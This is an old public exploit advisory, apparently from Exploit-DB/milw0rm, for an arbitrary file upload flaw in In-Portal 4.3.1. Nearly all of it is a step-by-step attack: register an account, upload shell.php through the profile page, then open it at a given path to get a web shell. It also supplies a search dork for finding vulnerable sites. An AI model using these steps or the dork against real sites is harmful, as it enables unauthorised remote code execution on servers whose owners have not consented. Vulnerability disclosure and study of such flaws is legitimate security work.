In-portal 4.3.1 - Arbitrary File Upload

EDB-ID:

9290

CVE:

N/A




Platform:

PHP

Date:

2009-07-28


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability

[+] D0rk : Powered by In-portal ® 1997-2009,

[+] Script site : www.in-portal.net

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site 

http://www.xxx.com/path/platform/login/register.html

step2: go to your profile 

http://www.xxx.com/path/platform/my_account/my_profile.html

step3: upload shell.php

step4: get shell

http://www.xxx.com/path/kernel/images/shell.php


Demo:
-----
http://www.in-portal.net/demo
-----




Yemeni ana ;)

# milw0rm.com [2009-07-28]